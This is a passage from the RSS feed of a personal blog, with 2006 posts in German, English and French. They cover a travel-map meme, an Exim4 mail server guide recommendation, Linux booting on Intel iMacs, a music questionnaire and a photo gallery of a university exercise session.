  7896.    <description><![CDATA[<p>
  7897. <a href="https://blog.x-way.org/images/countrymap.gif" title="countrymap">
  7898. <img width="400" height="250" src="https://blog.x-way.org/images/worldmap.gif" alt="worldmap">
  7899. </a>
  7900. </p>
  7901.  
  7902. <p>
  7903. Eigentlich sollte ich ja für die Prüfungen lernen und nicht vor dem Computer sitzen. Aber wenn die Motivation nicht da ist kann man nichts machen ;-)<br>
  7904. Und dann wirft mir <a href="https://kniebes.com" title="deep-resonance">Markus</a> auch noch ein Stöckchen zu. Danke, noch eine Ausrede mehr um mich vom Lernen abzuhalten :-)
  7905. </p>
  7906. <p>
  7907. Wie man sieht bin ich als Student noch nicht so viel in der Welt rumgekommen.<br>
  7908. Das Stöckchen gebe ich an <a href="https://web.archive.org/web/20070608110056/http://blog.robwei.de/rwo2k5/" title="RWo 2k5 :: Weblog (archive.org)">Robert</a>, <a href="https://web.archive.org/web/20070304175435/http://blog.boltzmann-konstante.de/" title="The Boltzmann Constant (archive.org)">Gordon</a> und <a href="https://web.archive.org/web/20060717105321/http://www.thegeek.de/blog/" title="thegeek.de blog (archive.org)">Marc</a> weiter.<br>Die Karten kann man sich bei <a href="https://web.archive.org/web/20060612234134/http://www.world66.com/myworld66" title="My World66 (archive.org)">world66.com</a> generieren lassen.<br>Voil&#224;!</p>
  7909.  
  7910. ]]></description>
  7911.    <content:encoded><![CDATA[<p>
  7912. <a href="https://blog.x-way.org/images/countrymap.gif" title="countrymap">
  7913. <img width="400" height="250" src="https://blog.x-way.org/images/worldmap.gif" alt="worldmap">
  7914. </a>
  7915. </p>
  7916.  
  7917. <p>
  7918. Eigentlich sollte ich ja für die Prüfungen lernen und nicht vor dem Computer sitzen. Aber wenn die Motivation nicht da ist kann man nichts machen ;-)<br>
  7919. Und dann wirft mir <a href="https://kniebes.com" title="deep-resonance">Markus</a> auch noch ein Stöckchen zu. Danke, noch eine Ausrede mehr um mich vom Lernen abzuhalten :-)
  7920. </p>
  7921. <p>
  7922. Wie man sieht bin ich als Student noch nicht so viel in der Welt rumgekommen.<br>
  7923. Das Stöckchen gebe ich an <a href="https://web.archive.org/web/20070608110056/http://blog.robwei.de/rwo2k5/" title="RWo 2k5 :: Weblog (archive.org)">Robert</a>, <a href="https://web.archive.org/web/20070304175435/http://blog.boltzmann-konstante.de/" title="The Boltzmann Constant (archive.org)">Gordon</a> und <a href="https://web.archive.org/web/20060717105321/http://www.thegeek.de/blog/" title="thegeek.de blog (archive.org)">Marc</a> weiter.<br>Die Karten kann man sich bei <a href="https://web.archive.org/web/20060612234134/http://www.world66.com/myworld66" title="My World66 (archive.org)">world66.com</a> generieren lassen.<br>Voil&#224;!</p>
  7924.  
  7925. ]]></content:encoded>
  7926.  </item>
  7927.  
  7928.  <item>
  7929.    <title>Four rings</title>
  7930.    <link>https://blog.x-way.org/Misc/2006/07/02/Four-rings.html</link>
  7931.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324090</guid>
  7932.    <dc:creator>Andreas Jaggi</dc:creator>
  7933.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  7934.    <pubDate>Sun, 02 Jul 2006 15:39:15 +0000</pubDate>
  7935.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  7936.    <description><![CDATA[<p><img width="318" height="253" src="https://blog.x-way.org/images/fourrings.jpg" alt="Four rings"></p>
  7937.  
  7938. <p>Via <a href="http://www.ende-der-vernunft.org/" title="EDV - Ende der Vernunft">EDV</a>.</p>
  7939.  
  7940. ]]></description>
  7941.    <content:encoded><![CDATA[<p><img width="318" height="253" src="https://blog.x-way.org/images/fourrings.jpg" alt="Four rings"></p>
  7942.  
  7943. <p>Via <a href="http://www.ende-der-vernunft.org/" title="EDV - Ende der Vernunft">EDV</a>.</p>
  7944.  
  7945. ]]></content:encoded>
  7946.  </item>
  7947.  
  7948.  <item>
  7949.    <title>Back in Black</title>
  7950.    <link>https://blog.x-way.org/Misc/2006/06/25/Back-in-Black.html</link>
  7951.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324089</guid>
  7952.    <dc:creator>Andreas Jaggi</dc:creator>
  7953.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  7954.    <pubDate>Sun, 25 Jun 2006 23:40:31 +0000</pubDate>
  7955.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  7956.    <description><![CDATA[<p><a href="https://blog.x-way.org/images/06-25-2006_23-38-1151271481.png" title="Back in Black"><img src="https://blog.x-way.org/images/backinblack.gif" width="147" height="84" alt="Back in Black"></a></p>
  7957. ]]></description>
  7958.    <content:encoded><![CDATA[<p><a href="https://blog.x-way.org/images/06-25-2006_23-38-1151271481.png" title="Back in Black"><img src="https://blog.x-way.org/images/backinblack.gif" width="147" height="84" alt="Back in Black"></a></p>
  7959. ]]></content:encoded>
  7960.  </item>
  7961.  
  7962.  <item>
  7963.    <title>Configuring Exim4 and Courier IMAP under Debian GNU/Linux</title>
  7964.    <link>https://blog.x-way.org/Linux/2006/06/25/Configuring-Exim4-and-Courier-IMAP-under-Debian-GNULinux.html</link>
  7965.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324088</guid>
  7966.    <dc:creator>Andreas Jaggi</dc:creator>
  7967.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  7968.    <pubDate>Sun, 25 Jun 2006 21:18:46 +0000</pubDate>
  7969.    <category domain="https://blog.x-way.org/Linux">Linux</category>
  7970.    <description><![CDATA[<p>Today I finally installed a mail transfer agent/mail delivery agent on my server.</p>
  7971. <p>I quickly looked at the most popular applications for such a job (<a href="http://exim.org/" title="exim Internet Mailer">Exim</a>, <a href="http://www.postfix.org/" title="The Postfix Home Page">Postfix</a> and <a href="http://qmail.omnis.ch/top.html" title="qmail: Second most popular MTA on the internet">qmail</a>) and choosed Exim 4 (especially because it's the only one which is 'real' opensource).</p>
  7972. <p>Then I searched a Howto or tutorial on Google, but most results were not really useful. For example the <a href="https://web.archive.org/web/20060630094103/http://archiv.debianhowto.de/en/exim4/index.html" title="Exim 4 Howto (archive.org)">Exim 4 Howto</a> from debianhowto.de like many others disappointed me a bit since they don't give any advice on configuring Exim. But after some evolution and mutation of the search string I finally found a very good guide.</p>
  7973. <p><a href="https://web.archive.org/web/20060701200837/http://www.trekweb.com/~jasonb/articles/exim4_courier/index.html" title="Configuring Exim4 and Courier IMAP under Debian GNU/Linux (archive.org)">Configuring Exim4 and Courier IMAP under Debian GNU/Linux</a> from <a href="https://web.archive.org/web/20060720111022/http://www.trekweb.com/~jasonb/" title="Jasons's Web Thingy (archive.org)">Jason Boxman</a> helped me to set up Exim step by step. Not also he explains how to install Exim but he also shows how to interact with Courier IMAP and how to secure all transfers with SSL.</p>
  7974. <p>I can only recommend you this guide if you want to install Exim 4 on a Debian system.</p>
  7975. ]]></description>
  7976.    <content:encoded><![CDATA[<p>Today I finally installed a mail transfer agent/mail delivery agent on my server.</p>
  7977. <p>I quickly looked at the most popular applications for such a job (<a href="http://exim.org/" title="exim Internet Mailer">Exim</a>, <a href="http://www.postfix.org/" title="The Postfix Home Page">Postfix</a> and <a href="http://qmail.omnis.ch/top.html" title="qmail: Second most popular MTA on the internet">qmail</a>) and choosed Exim 4 (especially because it's the only one which is 'real' opensource).</p>
  7978. <p>Then I searched a Howto or tutorial on Google, but most results were not really useful. For example the <a href="https://web.archive.org/web/20060630094103/http://archiv.debianhowto.de/en/exim4/index.html" title="Exim 4 Howto (archive.org)">Exim 4 Howto</a> from debianhowto.de like many others disappointed me a bit since they don't give any advice on configuring Exim. But after some evolution and mutation of the search string I finally found a very good guide.</p>
  7979. <p><a href="https://web.archive.org/web/20060701200837/http://www.trekweb.com/~jasonb/articles/exim4_courier/index.html" title="Configuring Exim4 and Courier IMAP under Debian GNU/Linux (archive.org)">Configuring Exim4 and Courier IMAP under Debian GNU/Linux</a> from <a href="https://web.archive.org/web/20060720111022/http://www.trekweb.com/~jasonb/" title="Jasons's Web Thingy (archive.org)">Jason Boxman</a> helped me to set up Exim step by step. Not also he explains how to install Exim but he also shows how to interact with Courier IMAP and how to secure all transfers with SSL.</p>
  7980. <p>I can only recommend you this guide if you want to install Exim 4 on a Debian system.</p>
  7981. ]]></content:encoded>
  7982.  </item>
  7983.  
  7984.  <item>
  7985.    <title>Lordi Rules</title>
  7986.    <link>https://blog.x-way.org/Misc/2006/05/25/Lordi-Rules.html</link>
  7987.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324087</guid>
  7988.    <dc:creator>Andreas Jaggi</dc:creator>
  7989.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  7990.    <pubDate>Thu, 25 May 2006 19:13:01 +0000</pubDate>
  7991.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  7992.    <description><![CDATA[It seems that <a href="http://en.wikipedia.org/wiki/Linus_Torvalds" title="Linus Torvalds - Wikipedia">Linus Torvalds</a> also followed the <a href="http://www.eurovision.tv/" title="Eurovision Song Contest">Eurovision Song Contest</a>. He called the new (fifth) release candidate of Linux 2.6.17 &quot;<a href="https://web.archive.org/web/20060516000905/http://www.lordi.org/" title="LORDI">Lordi</a> Rules&quot; which replaces the old name &quot;Sliding Snow Leopard&quot;. (via <a href="http://kernel.org/git/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commitdiff;h=a8bd60705aa17a998516837d9c1e503ad4cbd7fc;hp=4f3a151a11da3351e2149a401d4ee18426938de7" title="git - linux/kernel/git/torvalds/linux-2.6.git/commitdiff">git commit</a>)<br>
  7993. ]]></description>
  7994.    <content:encoded><![CDATA[It seems that <a href="http://en.wikipedia.org/wiki/Linus_Torvalds" title="Linus Torvalds - Wikipedia">Linus Torvalds</a> also followed the <a href="http://www.eurovision.tv/" title="Eurovision Song Contest">Eurovision Song Contest</a>. He called the new (fifth) release candidate of Linux 2.6.17 &quot;<a href="https://web.archive.org/web/20060516000905/http://www.lordi.org/" title="LORDI">Lordi</a> Rules&quot; which replaces the old name &quot;Sliding Snow Leopard&quot;. (via <a href="http://kernel.org/git/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commitdiff;h=a8bd60705aa17a998516837d9c1e503ad4cbd7fc;hp=4f3a151a11da3351e2149a401d4ee18426938de7" title="git - linux/kernel/git/torvalds/linux-2.6.git/commitdiff">git commit</a>)<br>
  7995. ]]></content:encoded>
  7996.  </item>
  7997.  
  7998.  <item>
  7999.    <title>Scriptaculous Cheat Sheet</title>
  8000.    <link>https://blog.x-way.org/Webdesign/2006/04/24/Scriptaculous-Cheat-Sheet.html</link>
  8001.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324086</guid>
  8002.    <dc:creator>Andreas Jaggi</dc:creator>
  8003.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  8004.    <pubDate>Mon, 24 Apr 2006 10:06:56 +0000</pubDate>
  8005.    <category domain="https://blog.x-way.org/Webdesign">Webdesign</category>
  8006.    <description><![CDATA[<p><a href="http://www.slash7.com/" title="(24)slash7">Amy Hoy</a> has released a nice <a href="http://www.slash7.com/articles/2006/04/22/scriptaculous-cheat-sheet-1" title="Scriptaculous Cheat Sheet #1">Scriptaculous Cheat Sheet</a> just at the right moment since I'm going to use <a href="http://script.aculo.us/" title="script.aculo.us - web 2.0 javascript">Scriptaculous</a> for the redesign of <a href="http://actualites.epfl.ch" title="News :: Media &amp; Communication">actualites.epfl.ch</a>.</p>
  8007. ]]></description>
  8008.    <content:encoded><![CDATA[<p><a href="http://www.slash7.com/" title="(24)slash7">Amy Hoy</a> has released a nice <a href="http://www.slash7.com/articles/2006/04/22/scriptaculous-cheat-sheet-1" title="Scriptaculous Cheat Sheet #1">Scriptaculous Cheat Sheet</a> just at the right moment since I'm going to use <a href="http://script.aculo.us/" title="script.aculo.us - web 2.0 javascript">Scriptaculous</a> for the redesign of <a href="http://actualites.epfl.ch" title="News :: Media &amp; Communication">actualites.epfl.ch</a>.</p>
  8009. ]]></content:encoded>
  8010.  </item>
  8011.  
  8012.  <item>
  8013.    <title>Fünf Fragen über Internet und Musik</title>
  8014.    <link>https://blog.x-way.org/Music/2006/02/18/Fuenf-Fragen-ueber-Internet-und-Musik.html</link>
  8015.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324085</guid>
  8016.    <dc:creator>Andreas Jaggi</dc:creator>
  8017.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  8018.    <pubDate>Sat, 18 Feb 2006 12:04:50 +0000</pubDate>
  8019.    <category domain="https://blog.x-way.org/Music">Music</category>
  8020.    <description><![CDATA[<p>Und wieder eine Ausgabe <a href="https://web.archive.org/web/20070813083532/http://xn--diefreitglichenfnf-stb20c.de/" title="Internet und Musik (die freitäglichen fünf) (archive.org)">der freitäglichen fünf</a>, diesmal zum Thema Musik und Internet.</p>
  8021.  
  8022. <ol>
  8023. <li>
  8024. <p><q>Nutzt du kostenpflichtige Angebote zum Musikdownload? Wenn ja,
  8025. welche und wenn nicht, warum nicht? Nutzt du kostenfreie (legale)
  8026. Angebote?</q></p>
  8027.  
  8028. <p>Nein, ich nutze weder einen kostenplichtigen noch einen kostenlosen
  8029. Musikdownload-Service. Meistens kaufe ich CDs direkt an einem Konzert
  8030. oder ich bestelle sie bei cede.ch.</p>
  8031. </li>
  8032.  
  8033. <li>
  8034. <p><q>Spielst du ein Instrument?</q></p>
  8035.  
  8036. <p>Aktuell nicht mehr, aber früher habe ich Schlagzeug gespielt.</p>
  8037. </li>
  8038.  
  8039. <li>
  8040. <p><q>Wie hat sich dein Musikgeschmack entwickelt? Haben Musikangebote aus dem Internet evtl. Einflu&#223; auf diese Entwicklung?</q></p>
  8041.  
  8042. <p>Bedingt durch mein Studium in Lausanne, hat mein Musikgeschmack in letzter Zeit etwas einen französischen Touch erhalten.<br>
  8043. Musikangebote aus dem Internet haben keinen Einfluss auf diese Entwicklung, hingegen die Konzerte im <a href="http://satwww.epfl.ch/" title="Satellite - Bar, Concerts, Cafés-Théâtres">Satellite</a> schon eher :-)</p>
  8044. </li>
  8045.  
  8046. <li>
  8047. <p><q>Bist Du mit der derzeitigen Gesetzgebung zum Thema Privatkopien vertraut?</q></p>
  8048.  
  8049. <p>Ja.</p>
  8050. </li>
  8051.  
  8052. <li>
  8053. <p><q>Deine Platten-, CD- oder MP3-Sammlung ist dein Schatz? Gibt es besondere Schmuckstücke?</q></p>
  8054.  
  8055. <p>Ein Schatz nicht direkt, aber ich verleihe meine CDs nicht gerne.<br>
  8056. Eigentliche Schmuckstücke oder richtige Raritäten besitze ich nicht,
  8057. aber diverse CDs sind signiert und mit einer Widmung versehen.</p>
  8058. </li>
  8059. </ol>
  8060. ]]></description>
  8061.    <content:encoded><![CDATA[<p>Und wieder eine Ausgabe <a href="https://web.archive.org/web/20070813083532/http://xn--diefreitglichenfnf-stb20c.de/" title="Internet und Musik (die freitäglichen fünf) (archive.org)">der freitäglichen fünf</a>, diesmal zum Thema Musik und Internet.</p>
  8062.  
  8063. <ol>
  8064. <li>
  8065. <p><q>Nutzt du kostenpflichtige Angebote zum Musikdownload? Wenn ja,
  8066. welche und wenn nicht, warum nicht? Nutzt du kostenfreie (legale)
  8067. Angebote?</q></p>
  8068.  
  8069. <p>Nein, ich nutze weder einen kostenplichtigen noch einen kostenlosen
  8070. Musikdownload-Service. Meistens kaufe ich CDs direkt an einem Konzert
  8071. oder ich bestelle sie bei cede.ch.</p>
  8072. </li>
  8073.  
  8074. <li>
  8075. <p><q>Spielst du ein Instrument?</q></p>
  8076.  
  8077. <p>Aktuell nicht mehr, aber früher habe ich Schlagzeug gespielt.</p>
  8078. </li>
  8079.  
  8080. <li>
  8081. <p><q>Wie hat sich dein Musikgeschmack entwickelt? Haben Musikangebote aus dem Internet evtl. Einflu&#223; auf diese Entwicklung?</q></p>
  8082.  
  8083. <p>Bedingt durch mein Studium in Lausanne, hat mein Musikgeschmack in letzter Zeit etwas einen französischen Touch erhalten.<br>
  8084. Musikangebote aus dem Internet haben keinen Einfluss auf diese Entwicklung, hingegen die Konzerte im <a href="http://satwww.epfl.ch/" title="Satellite - Bar, Concerts, Cafés-Théâtres">Satellite</a> schon eher :-)</p>
  8085. </li>
  8086.  
  8087. <li>
  8088. <p><q>Bist Du mit der derzeitigen Gesetzgebung zum Thema Privatkopien vertraut?</q></p>
  8089.  
  8090. <p>Ja.</p>
  8091. </li>
  8092.  
  8093. <li>
  8094. <p><q>Deine Platten-, CD- oder MP3-Sammlung ist dein Schatz? Gibt es besondere Schmuckstücke?</q></p>
  8095.  
  8096. <p>Ein Schatz nicht direkt, aber ich verleihe meine CDs nicht gerne.<br>
  8097. Eigentliche Schmuckstücke oder richtige Raritäten besitze ich nicht,
  8098. aber diverse CDs sind signiert und mit einer Widmung versehen.</p>
  8099. </li>
  8100. </ol>
  8101. ]]></content:encoded>
  8102.  </item>
  8103.  
  8104.  <item>
  8105.    <title>Mactel-Linux</title>
  8106.    <link>https://blog.x-way.org/Linux/2006/02/17/Mactel-Linux.html</link>
  8107.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324084</guid>
  8108.    <dc:creator>Andreas Jaggi</dc:creator>
  8109.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  8110.    <pubDate>Fri, 17 Feb 2006 09:57:58 +0000</pubDate>
  8111.    <category domain="https://blog.x-way.org/Linux">Linux</category>
  8112.    <description><![CDATA[<p>Linux wurde erfolgreich auf dem Intel-iMac gebootet! :-)
  8113. </p>
  8114.  
  8115. <p>
  8116. Mit Hilfe des EFI Linux Bootloaders <a href="http://elilo.sourceforge.net" title="elilo">elilo</a>, eines modifizierten Kernels und eines gehackten Vesa-Framebuffer Treibers ist es dem <a href="http://www.xbox-linux.org" title="Xbox-Linux">Xbox-Linux</a> Entwickler Edgar Hucek aka <a href="http://xbox-linux.org/mactel/index.php/User:Gimli" title="Mactel-Linux User:Gimli">gimli</a> gelungen den Linux Kernel und anschliessend auch <a href="http://www.gentoo.org" title="Gentoo Linux">Gentoo Linux</a> auf einem 17-Zoll iMac mit Intel Core Duo Prozessor zum Laufen zu bringen.</p>
  8117.  
  8118. <p>Im <a href="http://xbox-linux.org/mactel/index.php/Main_Page" title="Mactel-Linux">Mactel-Linux Wiki</a> finden sich schon ein paar <a href="http://xbox-linux.org/mactel/index.php/Screenshots" title="Screenshots - Mactel-Linux">Screenshots</a> sowie die Ausgaben von <a href="http://xbox-linux.org/mactel/index.php/Dmesg" title="dmesg - Mactel-Linux">dmesg</a> und <a href="http://xbox-linux.org/mactel/index.php/Lspci" title="lspci - Mactel-Linux">lspci</a>.<br>
  8119. Momentan konnte die graphische Oberfläche (aka X) noch nicht zum Starten gebracht werden. Anhand der Zeile
  8120. </p>
  8121.  
  8122. <pre>01:00.0 VGA compatible controller: ATI Technologies Inc Unknown device 71c5</pre>
  8123. <p>
  8124. in der Ausgabe von lspci vermute ich, dass die ATI Graphikkarte nicht
  8125. erkannt/unterstützt wird und deshalb X noch nicht gestartet werden
  8126. kann. Aber wie vom Entwickler gesagt, ist Mactel-Linux vorerst nur ein
  8127. grosser Hack, und es wird noch etwas Zeit benötigen bis Linux stabil
  8128. auf den Intel Macs läuft.</p>
  8129.  
  8130. <p>Bei der Namenswahl hätten sich die Entwickler von mir aus lieber
  8131. etwas anderes einfallen lassen können. 'Mactel' assoziere ich mit
  8132. Telefon und nicht mit Computer. Aber daran werde ich mich wohl gewöhnen
  8133. müssen, genauso wie an das unmögliche 'MacBook Pro'.</p>
  8134.  
  8135. <p>via <a href="http://www.symlink.ch" title="symlink.ch">symlink.ch</a></p>
  8136.  
  8137. <p><b>Update 18.02.06:</b></p>
  8138. <p>Mittlerweile existiert auch ein <a href="http://www.mactel-linux.org/wiki/HOWTO" title="HOWTO - Mactel-Linux">HOWTO</a> und eine <a href="http://www.mactel-linux.org/wiki/EFI_Memory_Map_from_kernel" title="EFI Memory Map from kernel">Memory Map des EFI</a>. Der gehackte Vesa-Framebuffer Treiber funktioniert bis jetzt aber ausschliesslich mit dem 17-Zoll iMac.</p>
  8139. ]]></description>
  8140.    <content:encoded><![CDATA[<p>Linux wurde erfolgreich auf dem Intel-iMac gebootet! :-)
  8141. </p>
  8142.  
  8143. <p>
  8144. Mit Hilfe des EFI Linux Bootloaders <a href="http://elilo.sourceforge.net" title="elilo">elilo</a>, eines modifizierten Kernels und eines gehackten Vesa-Framebuffer Treibers ist es dem <a href="http://www.xbox-linux.org" title="Xbox-Linux">Xbox-Linux</a> Entwickler Edgar Hucek aka <a href="http://xbox-linux.org/mactel/index.php/User:Gimli" title="Mactel-Linux User:Gimli">gimli</a> gelungen den Linux Kernel und anschliessend auch <a href="http://www.gentoo.org" title="Gentoo Linux">Gentoo Linux</a> auf einem 17-Zoll iMac mit Intel Core Duo Prozessor zum Laufen zu bringen.</p>
  8145.  
  8146. <p>Im <a href="http://xbox-linux.org/mactel/index.php/Main_Page" title="Mactel-Linux">Mactel-Linux Wiki</a> finden sich schon ein paar <a href="http://xbox-linux.org/mactel/index.php/Screenshots" title="Screenshots - Mactel-Linux">Screenshots</a> sowie die Ausgaben von <a href="http://xbox-linux.org/mactel/index.php/Dmesg" title="dmesg - Mactel-Linux">dmesg</a> und <a href="http://xbox-linux.org/mactel/index.php/Lspci" title="lspci - Mactel-Linux">lspci</a>.<br>
  8147. Momentan konnte die graphische Oberfläche (aka X) noch nicht zum Starten gebracht werden. Anhand der Zeile
  8148. </p>
  8149.  
  8150. <pre>01:00.0 VGA compatible controller: ATI Technologies Inc Unknown device 71c5</pre>
  8151. <p>
  8152. in der Ausgabe von lspci vermute ich, dass die ATI Graphikkarte nicht
  8153. erkannt/unterstützt wird und deshalb X noch nicht gestartet werden
  8154. kann. Aber wie vom Entwickler gesagt, ist Mactel-Linux vorerst nur ein
  8155. grosser Hack, und es wird noch etwas Zeit benötigen bis Linux stabil
  8156. auf den Intel Macs läuft.</p>
  8157.  
  8158. <p>Bei der Namenswahl hätten sich die Entwickler von mir aus lieber
  8159. etwas anderes einfallen lassen können. 'Mactel' assoziere ich mit
  8160. Telefon und nicht mit Computer. Aber daran werde ich mich wohl gewöhnen
  8161. müssen, genauso wie an das unmögliche 'MacBook Pro'.</p>
  8162.  
  8163. <p>via <a href="http://www.symlink.ch" title="symlink.ch">symlink.ch</a></p>
  8164.  
  8165. <p><b>Update 18.02.06:</b></p>
  8166. <p>Mittlerweile existiert auch ein <a href="http://www.mactel-linux.org/wiki/HOWTO" title="HOWTO - Mactel-Linux">HOWTO</a> und eine <a href="http://www.mactel-linux.org/wiki/EFI_Memory_Map_from_kernel" title="EFI Memory Map from kernel">Memory Map des EFI</a>. Der gehackte Vesa-Framebuffer Treiber funktioniert bis jetzt aber ausschliesslich mit dem 17-Zoll iMac.</p>
  8167. ]]></content:encoded>
  8168.  </item>
  8169.  
  8170.  <item>
  8171.    <title>Corréctions des exercices du génie logiciel</title>
  8172.    <link>https://blog.x-way.org/School/2006/01/24/Corrections-des-exercices-du-genie-logiciel.html</link>
  8173.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324083</guid>
  8174.    <dc:creator>Andreas Jaggi</dc:creator>
  8175.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  8176.    <pubDate>Tue, 24 Jan 2006 22:35:31 +0000</pubDate>
  8177.    <category domain="https://blog.x-way.org/School">School</category>
  8178.    <description><![CDATA[<dl class="tdl">
  8179. <dt><a href="https://blog.x-way.org/images/dsc01442.jpg"><img src="https://blog.x-way.org/images/dsc01442_thumb.jpg" style="height: 75px; width: 100px;" alt="dsc01442_thumb.jpg"></a></dt>
  8180. <dd class="tdlb"></dd>
  8181. </dl>
  8182. <p>Voil&#224; quelques images de la s&#233;ance d'exercices du <a href="https://web.archive.org/web/20060512192009/http://lgl.epfl.ch/members/baar/lectureSWE0506/index.html" title="Lecture Software Engineering, EPFL, Winter 2005/06 (archive.org)">cours du g&#233;nie logiciel</a>.</p>
  8183. <br><br>
  8184. <dl class="tdl">
  8185. <dt><a href="https://blog.x-way.org/images/dsc01443.jpg"><img src="https://blog.x-way.org/images/dsc01443_thumb.jpg" alt="images/dsc01443_thumb.jpg" style="height:75px;width:100px;"></a></dt>
  8186. <dd class="tdlb"></dd>
  8187. <dt><a href="https://blog.x-way.org/images/dsc01446.jpg"><img src="https://blog.x-way.org/images/dsc01446_thumb.jpg" alt="images/dsc01446_thumb.jpg" style="height:75px;width:100px;"></a></dt>
  8188. <dd class="tdlb"></dd>
  8189. <dt><a href="https://blog.x-way.org/images/dsc01447.jpg"><img src="https://blog.x-way.org/images/dsc01447_thumb.jpg" alt="images/dsc01447_thumb.jpg" style="height:75px;width:100px;"></a></dt>
  8190. <dd class="tdlb"></dd>
  8191. <dt><a href="https://blog.x-way.org/images/dsc01448.jpg"><img src="https://blog.x-way.org/images/dsc01448_thumb.jpg" alt="images/dsc01448_thumb.jpg" style="height:75px;width:100px;"></a></dt>
  8192. <dd class="tdlb"></dd>
  8193. <dt><a href="https://blog.x-way.org/images/dsc01449.jpg"><img src="https://blog.x-way.org/images/dsc01449_thumb.jpg" alt="images/dsc01449_thumb.jpg" style="height:75px;width:100px;"></a></dt>
  8194. <dd class="tdlb"></dd>
  8195. <dt><a href="https://blog.x-way.org/images/dsc01450.jpg"><img src="https://blog.x-way.org/images/dsc01450_thumb.jpg" alt="images/dsc01450_thumb.jpg" style="height:75px;width:100px;"></a></dt>
  8196. <dd class="tdlb"></dd>
  8197. <dt><a href="https://blog.x-way.org/images/dsc01451.jpg"><img src="https://blog.x-way.org/images/dsc01451_thumb.jpg" alt="images/dsc01451_thumb.jpg" style="height:75px;width:100px;"></a></dt>
  8198. <dd class="tdlb"></dd>
  8199. <dt><a href="https://blog.x-way.org/images/dsc01452.jpg"><img src="https://blog.x-way.org/images/dsc01452_thumb.jpg" alt="images/dsc01452_thumb.jpg" style="height:75px;width:100px;"></a></dt>
  8200. <dd class="tdlb"></dd>
  8201. <dt><a href="https://blog.x-way.org/images/dsc01453.jpg"><img src="https://blog.x-way.org/images/dsc01453_thumb.jpg" alt="images/dsc01453_thumb.jpg" style="height:75px;width:100px;"></a></dt>
  8202. <dd class="tdlb"></dd>
  8203. <dt><a href="https://blog.x-way.org/images/dsc01454.jpg"><img src="https://blog.x-way.org/images/dsc01454_thumb.jpg" alt="images/dsc01454_thumb.jpg" style="height:75px;width:100px;"></a></dt>
  8204. <dd class="tdlb"></dd>
  8205. <dt><a href="https://blog.x-way.org/images/dsc01455.jpg"><img src="https://blog.x-way.org/images/dsc01455_thumb.jpg" alt="images/dsc01455_thumb.jpg" style="height:75px;width:100px;"></a></dt>
  8206. <dd class="tdlb"></dd>
  8207. <dt><a href="https://blog.x-way.org/images/dsc01456.jpg"><img src="https://blog.x-way.org/images/dsc01456_thumb.jpg" alt="images/dsc01456_thumb.jpg" style="height:75px;width:100px;"></a></dt>
  8208. <dd class="tdlb"></dd>
  8209. <dt><a href="https://blog.x-way.org/images/dsc01457.jpg"><img src="https://blog.x-way.org/images/dsc01457_thumb.jpg" alt="images/dsc01457_thumb.jpg" style="height:75px;width:100px;"></a></dt>
  8210. <dd class="tdlb"></dd>
  8211. <dt><a href="https://blog.x-way.org/images/dsc01458.jpg"><img src="https://blog.x-way.org/images/dsc01458_thumb.jpg" alt="images/dsc01458_thumb.jpg" style="height:75px;width:100px;"></a></dt>
  8212. <dd class="tdlb"></dd>
  8213. <dt><a href="https://blog.x-way.org/images/dsc01459.jpg"><img src="https://blog.x-way.org/images/dsc01459_thumb.jpg" alt="images/dsc01459_thumb.jpg" style="height:75px;width:100px;"></a></dt>
  8214. <dd class="tdlb"></dd>
  8215. <dt><a href="https://blog.x-way.org/images/dsc01460.jpg"><img src="https://blog.x-way.org/images/dsc01460_thumb.jpg" alt="images/dsc01460_thumb.jpg" style="height:75px;width:100px;"></a></dt>
  8216. <dd class="tdlb"></dd>
  8217. <dt><a href="https://blog.x-way.org/images/dsc01461.jpg"><img src="https://blog.x-way.org/images/dsc01461_thumb.jpg" alt="images/dsc01461_thumb.jpg" style="height:75px;width:100px;"></a></dt>
  8218. <dd class="tdlb"></dd>
  8219. <dt><a href="https://blog.x-way.org/images/dsc01463.jpg"><img src="https://blog.x-way.org/images/dsc01463_thumb.jpg" alt="images/dsc01463_thumb.jpg" style="height:75px;width:100px;"></a></dt>
  8220. <dd class="tdlb"></dd>
  8221. </dl>
  8222.  
  8223. ]]></description>
  8224.    <content:encoded><![CDATA[<dl class="tdl">
  8225. <dt><a href="https://blog.x-way.org/images/dsc01442.jpg"><img src="https://blog.x-way.org/images/dsc01442_thumb.jpg" style="height: 75px; width: 100px;" alt="dsc01442_thumb.jpg"></a></dt>
  8226. <dd class="tdlb"></dd>
  8227. </dl>
  8228. <p>Voil&#224; quelques images de la s&#233;ance d'exercices du <a href="https://web.archive.org/web/20060512192009/http://lgl.epfl.ch/members/baar/lectureSWE0506/index.html" title="Lecture Software Engineering, EPFL, Winter 2005/06 (archive.org)">cours du g&#233;nie logiciel</a>.</p>
  8229. <br><br>
  8230. <dl class="tdl">
  8231. <dt><a href="https://blog.x-way.org/images/dsc01443.jpg"><img src="https://blog.x-way.org/images/dsc01443_thumb.jpg" alt="images/dsc01443_thumb.jpg" style="height:75px;width:100px;"></a></dt>
  8232. <dd class="tdlb"></dd>
